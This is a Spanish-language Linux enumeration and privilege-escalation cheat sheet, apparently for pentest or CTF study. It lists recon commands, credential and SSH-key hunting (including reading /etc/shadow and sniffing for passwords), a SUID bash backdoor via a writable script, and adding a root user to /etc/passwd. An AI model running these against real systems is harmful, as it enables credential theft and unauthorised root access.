Enumeración en Linux
Sistema
hostname
hostname -I
uname -a
w
lastlog
cat /etc/issue
cat /etc/os-release
cat /proc/version
cat /etc/shells
sudo -V
ps aux
df -h
mount
cat /etc/fstab
cat /etc/fstab | grep -v "#" | column -t
lscpu
lsblk
lsmod
/sbin/modinfo libata
Red
ip a
ifconfig
route
arp -a
ip route
ip neigh
ss -anp
netstat -net
netstat -ano
cat /etc/hosts
cat /etc/iptables/rules.v4
Usuarios y Grupos
whoami
id
env
history
cat .bashrc
cat /etc/passwd
cat /etc/passwd | grep "sh$"
grep "sh$" /etc/passwd | awk '{print $1}' FS=":"
cat /etc/shadow
cat /etc/group
getent group sudo
sudo -l
Algoritmos más utilizados
| Algoritmo | Hash |
|---|---|
| Salted MD5 | $1$… |
| SHA-256 | $5$… |
| SHA-512 | $6$… |
| BCrypt | $2a$… |
| Scrypt | $7$… |
| Argon2 | $argon2i$… |
Tareas Cron
crontab -l
sudo crontab -l
cat /var/log/syslog
ls -lah /etc/cron*
Capabilities
/usr/sbin/getcap -r / 2>/dev/null
Archivos y Directorios
ls -l /tmp /var/tmp /dev/shm
find / -writable -type f 2>/dev/null
find / -writable -type d 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share"
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep student
find / -type d -name ".*" -ls 2>/dev/null
find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null
Búsqueda de credenciales
locate password | more
find / type f -name wp-config.php -exec grep -E "DB_PASSWORD|DB_USER|DB_NAME" {} \; 2>/dev/null
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
find / -name password 2>/dev/null -exec ls -l {} \; 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null
grep -rnw '/' -ie "PASSWORD" –color=always 2>/dev/null
Binarios y Paquetes instalados
dpkg -l
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list
ls -l /bin /usr/bin/ /usr/sbin/
Procesos y Servicios
strace
ps aux | grep root
find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n"
watch -n 1 "ps -aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"
Búsqueda de claves SSH
find / -name authorized_keys 2>/dev/null
find / -name id_rsa 2>/dev/null
Archivos con permisos de escritura
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash'> /home/user/.backups/script.sh
Abusando de Permisos inseguros
Si por alguna razón podemos escribir en el archivo /etc/passwd, generamos el hash correspondiente y agregamos una línea a /etc/passwd usando el formato apropiado:
openssl passwd w00t
echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
su - root2